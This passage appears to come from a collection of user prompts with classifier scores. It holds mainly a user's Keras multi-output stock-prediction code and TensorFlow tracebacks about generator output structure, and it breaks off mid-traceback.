'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
y_high_1d = data['y_High_1d'].values
y_low_1d = data['y_Low_1d'].values
y_priority_1d = data['y_Priority_1d'].values
y_high_2d = data['y_High_2d'].values
y_low_2d = data['y_Low_2d'].values
y_priority_2d = data['y_Priority_2d'].values
y_high_3d = data['y_High_3d'].values
y_low_3d = data['y_Low_3d'].values
y_priority_3d = data['y_Priority_3d'].values
y_high_5d = data['y_High_5d'].values
y_low_5d = data['y_Low_5d'].values
y_priority_5d = data['y_Priority_5d'].values
# Optionally, apply preprocessing here (e.g., Scaler transform)
if scaler is not None and train:
X = scaler.fit_transform(X)
elif scaler is not None:
X = scaler.transform(X)
# Splitting data into batches
for i in range(0, len(data), batch_size):
end = i + batch_size
X_batch = X[i:end]
y_high_batch_1d = y_high_1d[i:end]
y_low_batch_1d = y_low_1d[i:end]
y_priority_batch_1d = y_priority_1d[i:end]
y_high_batch_2d = y_high_2d[i:end]
y_low_batch_2d = y_low_2d[i:end]
y_priority_batch_2d = y_priority_2d[i:end]
y_high_batch_3d = y_high_3d[i:end]
y_low_batch_3d = y_low_3d[i:end]
y_priority_batch_3d = y_priority_3d[i:end]
y_high_batch_5d = y_high_5d[i:end]
y_low_batch_5d = y_low_5d[i:end]
y_priority_batch_5d = y_priority_5d[i:end]
yield X_batch, [y_high_batch_1d, y_low_batch_1d,y_priority_batch_1d,
y_high_batch_2d, y_low_batch_2d,y_priority_batch_2d,
y_high_batch_3d, y_low_batch_3d, y_priority_batch_3d,
y_high_batch_5d, y_low_batch_5d, y_priority_batch_5d]
# %%
dataset_dir = r'C:\Users\arisa\Desktop\day_spot'
file_paths = [os.path.join(dataset_dir, file_name) for file_name in os.listdir(dataset_dir)]
train_files, val_files = train_test_split(file_paths, test_size=0.06, random_state=42)
batch_size = 72
# %%
# Optional: Initialize a scaler for data normalization
scaler = StandardScaler()
# %%
# Create data generators
train_gen = data_generator(train_files, batch_size, train=True, scaler=scaler)
val_gen = data_generator(val_files, batch_size, train=False, scaler=scaler)
# %%
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
# %%
import os
import pandas as pd
def count_samples(file_paths):
total_samples = 0
for file_path in file_paths:
df = pd.read_csv(file_path)
samples = len(df)
total_samples += samples
return total_samples
number_of_training_samples = count_samples(train_files)
number_of_validation_samples = count_samples(val_files)
print(f'Number of training samples: {number_of_training_samples}')
print(f'Number of validation samples: {number_of_validation_samples}')
# %%
# Assuming you have the data_generator function as defined in your question
# Generate a small batch for testing
test_gen = data_generator(train_files, batch_size=72, train=True, scaler=StandardScaler())
# Fetch one batch of data
X_batch, y_batch_list = next(test_gen)
# Check the shape of the features (X)
print("Shape of X_batch:", X_batch.shape)
# Since y_batch_list is a list of outputs (high, low, priority for different days), inspect each
for i, y_batch in enumerate(y_batch_list):
print(f"Shape of y_batch {i}:", y_batch.shape)
# %%
# You'll need to determine steps_per_epoch and validation_steps based on your data size and batch size
steps_per_epoch = np.ceil(number_of_training_samples / batch_size) # Replace number_of_training_samples
validation_steps = np.ceil(number_of_validation_samples / batch_size) # Replace number_of_validation_samples
model.fit(train_gen,
steps_per_epoch=steps_per_epoch,
validation_data=val_gen,
validation_steps=validation_steps,
epochs=1000)
error:
{
"name": "TypeError",
"message": "`output_signature` must contain objects that are subclass of `tf.TypeSpec` but found <class 'list'> which is not.",
"stack": "---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[18], line 5
2 steps_per_epoch = np.ceil(number_of_training_samples / batch_size) # Replace number_of_training_samples
3 validation_steps = np.ceil(number_of_validation_samples / batch_size) # Replace number_of_validation_samples
----> 5 model.fit(train_gen,
6 steps_per_epoch=steps_per_epoch,
7 validation_data=val_gen,
8 validation_steps=validation_steps,
9 epochs=1000)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py:124, in _from_generator(generator, output_types, output_shapes, args, output_signature, name)
122 for spec in nest.flatten(output_signature):
123 if not isinstance(spec, type_spec.TypeSpec):
--> 124 raise TypeError(f\"`output_signature` must contain objects that are \"
125 f\"subclass of `tf.TypeSpec` but found {type(spec)} \"
126 f\"which is not.\")
127 else:
128 if output_types is None:
TypeError: `output_signature` must contain objects that are subclass of `tf.TypeSpec` but found <class 'list'> which is not."
}
|
90378e60391293c4993a0a2f6efccf05
|
{
"intermediate": 0.4520384967327118,
"beginner": 0.3773055672645569,
"expert": 0.1706559956073761
}
|
46,739
|
hello
|
441700cbb20740a220e682023c9b5b84
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
46,740
|
Hi there, please be a senior sapui5 developer and answer my following questions with working code examples.
|
1d3941712ab0a982f2950190e0704aa9
|
{
"intermediate": 0.42116406559944153,
"beginner": 0.2712341248989105,
"expert": 0.3076017498970032
}
|
46,741
|
my code:
# %%
import os
import numpy as np
import pandas as pd
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from tensorflow.keras.layers import Input, Dropout
from tensorflow.keras import Model
# %%
def data_generator(file_paths, batch_size, train=True, scaler=None):
while True: # Loop forever so the generator never terminates
# Shuffle file paths to ensure random distribution of data across files
np.random.shuffle(file_paths)
for file_path in file_paths:
data = pd.read_csv(file_path)
# Split features and labels
X = data.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
y_high_1d = data['y_High_1d'].values
y_low_1d = data['y_Low_1d'].values
y_priority_1d = data['y_Priority_1d'].values
y_high_2d = data['y_High_2d'].values
y_low_2d = data['y_Low_2d'].values
y_priority_2d = data['y_Priority_2d'].values
y_high_3d = data['y_High_3d'].values
y_low_3d = data['y_Low_3d'].values
y_priority_3d = data['y_Priority_3d'].values
y_high_5d = data['y_High_5d'].values
y_low_5d = data['y_Low_5d'].values
y_priority_5d = data['y_Priority_5d'].values
# Optionally, apply preprocessing here (e.g., Scaler transform)
if scaler is not None and train:
X = scaler.fit_transform(X)
elif scaler is not None:
X = scaler.transform(X)
# Splitting data into batches
for i in range(0, len(data), batch_size):
end = i + batch_size
X_batch = X[i:end]
y_high_batch_1d = y_high_1d[i:end]
y_low_batch_1d = y_low_1d[i:end]
y_priority_batch_1d = y_priority_1d[i:end]
y_high_batch_2d = y_high_2d[i:end]
y_low_batch_2d = y_low_2d[i:end]
y_priority_batch_2d = y_priority_2d[i:end]
y_high_batch_3d = y_high_3d[i:end]
y_low_batch_3d = y_low_3d[i:end]
y_priority_batch_3d = y_priority_3d[i:end]
y_high_batch_5d = y_high_5d[i:end]
y_low_batch_5d = y_low_5d[i:end]
y_priority_batch_5d = y_priority_5d[i:end]
yield X_batch, [y_high_batch_1d, y_low_batch_1d,y_priority_batch_1d,
y_high_batch_2d, y_low_batch_2d,y_priority_batch_2d,
y_high_batch_3d, y_low_batch_3d, y_priority_batch_3d,
y_high_batch_5d, y_low_batch_5d, y_priority_batch_5d]
# %%
dataset_dir = r'C:\Users\arisa\Desktop\day_spot'
file_paths = [os.path.join(dataset_dir, file_name) for file_name in os.listdir(dataset_dir)]
train_files, val_files = train_test_split(file_paths, test_size=0.06, random_state=42)
batch_size = 72
# %%
# Optional: Initialize a scaler for data normalization
scaler = StandardScaler()
# %%
# Create data generators
train_gen = data_generator(train_files, batch_size, train=True, scaler=scaler)
val_gen = data_generator(val_files, batch_size, train=False, scaler=scaler)
# %%
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
# %%
import os
import pandas as pd
def count_samples(file_paths):
total_samples = 0
for file_path in file_paths:
df = pd.read_csv(file_path)
samples = len(df)
total_samples += samples
return total_samples
number_of_training_samples = count_samples(train_files)
number_of_validation_samples = count_samples(val_files)
print(f'Number of training samples: {number_of_training_samples}')
print(f'Number of validation samples: {number_of_validation_samples}')
# %%
import tensorflow as tf
output_signature = (
tf.TensorSpec(shape=(None, X_batch.shape[1]), dtype=tf.float32), # for X_batch
(
tf.TensorSpec(shape=(None, 1), dtype=tf.float32), # For each y_batch
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
tf.TensorSpec(shape=(None, 1), dtype=tf.float32),
)
)
train_dataset = tf.data.Dataset.from_generator(
lambda: train_gen,
output_signature=output_signature
)
val_dataset = tf.data.Dataset.from_generator(
lambda: val_gen,
output_signature=output_signature
)
# %%
# You'll need to determine steps_per_epoch and validation_steps based on your data size and batch size
steps_per_epoch = np.ceil(number_of_training_samples / batch_size).astype(int) # Replace number_of_training_samples
validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
# model.fit(train_gen,
# steps_per_epoch=steps_per_epoch,
# validation_data=val_gen,
# validation_steps=validation_steps,
# epochs=1000)
# Then use these datasets in your model.fit call
model.fit(train_dataset,
steps_per_epoch=steps_per_epoch,
validation_data=val_dataset,
validation_steps=validation_steps,
epochs=1000)
error:
{
"name": "InvalidArgumentError",
"message": "Graph execution error:
Detected at node PyFunc defined at (most recent call last):
<stack traces unavailable>
TypeError: `generator` yielded an element that did not match the expected structure. The expected structure was (tf.float32, (tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32)), but the yielded element was (array([[-0.39491499, -0.40790701, -0.37860123, ..., 0. ,
0. , 0. ],
[-0.387636 , -0.40270658, -0.36623326, ..., 0. ,
0. , 0. ],
[-0.37878316, -0.3817255 , -0.36090224, ..., 0. ,
0. , 0. ],
...,
[-0.52475656, -0.52626182, -0.50974435, ..., 0. ,
0. , 0. ],
[-0.51747756, -0.52410992, -0.52168584, ..., 0. ,
0. , 0. ],
[-0.5349865 , -0.54096651, -0.52360501, ..., 0. ,
0. , 0. ]]), [array([ 1.88098495, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 0.48143054, 3.14661134, 0.27275827, 1.09270356,
1.1967617 , 1.36746143, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 0.57430007, 4.045605 , 0. , 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 1.39458573, 1.54723127,
0. , 1.61366872, 2.4262607 , 3.27255727, 2.55102041,
2.03117619, 2.6119403 , 3.37806571, 0.36798528, 2.41134752,
3.83536015, 4.19296664, 3.51339482, 5.09009009, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 3.21543408,
5.70910739, 2.98313878, 1.13350126, 3.37781485, 3.61201299,
1.90555095, 3.76229158, 1.95295162, 0.65387969, 1.0521701 ,
3.44827586, 0.92470277, 1.36503743, 6.97368421, 4.68364832,
2.41014799, 0.3776752 , 4.12684622, 1.22466216, 1.92560175,
2.47131509, 4.88021295, 1.13636364, 2.78276481, 1.63355408,
1.51724138, 6.37413395]), array([ -1.19699042, -1.85247558, -4.78061559, -0.94466937,
-2.002002 , -3.58579088, -1.89133425, -0.82987552,
-4.90964882, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -0.99315068, -5.15641114,
-3.51758794, -1.25045973, -2.2411953 , -1.11550918,
-11.94404591, -0.90337785, -7.99695354, -1.64068909,
-1.79153094, -22.43485342, -1.99335548, -3.04471931,
-0.46750818, -4.63821892, -2.50354275, -2.51865672,
-0.78667284, -3.31186753, -0.80378251, -1.87090739,
-3.69702435, -3.20597277, -1.66666667, -1.69565217,
-0.99050764, -5.91420242, -0.56374675, -9.66494845,
-0.68902159, -3.94200272, -0.51880674, -3.61041142,
-0.54211843, -2.5974026 , -4.97100249, -3.8477982 ,
-1.42032845, -2.83347864, -2.41122315, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-1.18393235, -4.1963911 , -1.39009557, -5.40540541,
-1.48796499, -2.33892321, -0.88731145, -3.71503497,
-0.53859964, -4.63576159, -1.10344828, -1.61662818]), array([0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0,
1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1,
0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1,
0, 1, 0, 1, 1, 0], dtype=int64), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.33944307,
1.75994368, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 2.18319886, 5.0903901 , 3.36605891, 2.55102041,
3.92064242, 4.19776119, 3.37806571, 0.36798528, 4.96453901,
8.09167446, 6.26690712, 3.51339482, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 7.16582453,
7.92931581, 4.15045396, 4.07220823, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.65387969, 1.27137221,
3.44827586, 1.36503743, 7.39762219, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 1.92560175,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.63355408,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -0.94466937,
-4.004004 , -4.39008043, -1.89133425, -3.5615491 ,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -5.51369863, -7.59711241,
-3.6252692 , -1.25045973, -2.2411953 , -11.6588701 ,
-11.94404591, -5.1060487 , -8.6824067 , -1.64068909,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.73021749, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.69565217,
-6.76846884, -5.91420242, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-0.54211843, -6.89935065, -6.83512842, -5.04489098,
-1.42032845, -2.96425458, -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-3.46723044, -4.74192195, -2.69331017, -5.40540541,
-3.15098468, -2.33892321, -2.26264419, -3.71503497,
-3.05206463, -5.03311258, -2.06896552, -1.61662818]), array([0., 1., 1., 0., 1., 1., 0., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 0., 1., 1., 1., 1., 0., 1., 1., 0., 0., 1., 1., 0., 0., 1., 1.,
0., 0., 0., 1., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1.,
1., 0., 1., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 1.,
1., 1., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.9034191 ,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.84100617, 5.18553758, 3.36605891, 2.55102041,
5.52668871, 4.19776119, 3.37806571, 2.11591536, 9.26713948,
10.24321796, 6.26690712, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.21477663, 9.41662839,
9.15269597, 7.17682663, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.69747167, 1.27137221,
3.44827586, 7.39762219, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -2.93522267,
-4.8048048 , -4.39008043, -4.09215956, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -6.63282572, -7.94520548, -7.70024063,
-3.6252692 , -1.25045973, -12.66453219, -11.6588701 ,
-13.34289813, -5.81304006, -8.6824067 , -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.7826087 ,
-6.76846884, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-4.33694746, -8.72564935, -7.995029 , -5.04489098,
-1.42032845, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.20377979,
-4.01691332, -6.00083928, -2.69331017, -6.54560811,
-3.15098468, -2.78022948, -2.26264419, -5.59440559,
-3.45601436, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1., 1., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 1., 1.,
1., 0., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 2.21616093, 5.67500881,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.93592786, 5.18553758, 4.44132772, 3.61781076,
5.52668871, 4.19776119, 6.94123091, 8.41766329, 11.44208038,
23.52666043, 19.07123535, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.29575022, 3.47938144, 13.87230133,
15.67739012, 10.37613489, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.52996005, 0.69747167, 6.9267865 ,
14.10658307, 12.19726993, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.36624776, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -3.09868643, -6.58153242, -3.74493927,
-6.94027361, -7.77479893, -5.36451169, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -3.26086957,
-6.56934307, -9.13705584, -8.04794521, -7.70024063,
-11.88083274, -9.709452 , -14.05193881, -13.70996761,
-13.98852224, -25.17674784, -27.45620716, -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -8.56521739,
-13.20676847, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.82144401, -5.58354324,
-7.38115096, -9.86201299, -7.995029 , -7.6528431 ,
-4.12782956, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -7.97041906,
-5.28541226, -7.13386488, -3.8662033 , -6.96790541,
-3.58862144, -4.67784643, -4.56965395, -6.90559441,
-4.39856373, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
0., 0., 0., 0.])]).
Traceback (most recent call last):
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py\", line 204, in generator_py_func
flattened_values = nest.flatten_up_to(output_types, values)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\util\
est.py\", line 237, in flatten_up_to
return nest_util.flatten_up_to(
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1541, in flatten_up_to
return _tf_data_flatten_up_to(shallow_tree, input_tree)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1570, in _tf_data_flatten_up_to
_tf_data_assert_shallow_structure(shallow_tree, input_tree)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1444, in _tf_data_assert_shallow_structure
_tf_data_assert_shallow_structure(
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1414, in _tf_data_assert_shallow_structure
raise TypeError(
TypeError: If shallow structure is a sequence, input must also be a sequence. Input has type: 'list'.
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\ops\\script_ops.py\", line 270, in __call__
ret = func(*args)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\autograph\\impl\\api.py\", line 643, in wrapper
return func(*args, **kwargs)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py\", line 206, in generator_py_func
raise TypeError(
TypeError: `generator` yielded an element that did not match the expected structure. The expected structure was (tf.float32, (tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32)), but the yielded element was (array([[-0.39491499, -0.40790701, -0.37860123, ..., 0. ,
0. , 0. ],
[-0.387636 , -0.40270658, -0.36623326, ..., 0. ,
0. , 0. ],
[-0.37878316, -0.3817255 , -0.36090224, ..., 0. ,
0. , 0. ],
...,
[-0.52475656, -0.52626182, -0.50974435, ..., 0. ,
0. , 0. ],
[-0.51747756, -0.52410992, -0.52168584, ..., 0. ,
0. , 0. ],
[-0.5349865 , -0.54096651, -0.52360501, ..., 0. ,
0. , 0. ]]), [array([ 1.88098495, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 0.48143054, 3.14661134, 0.27275827, 1.09270356,
1.1967617 , 1.36746143, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 0.57430007, 4.045605 , 0. , 1.76322418,
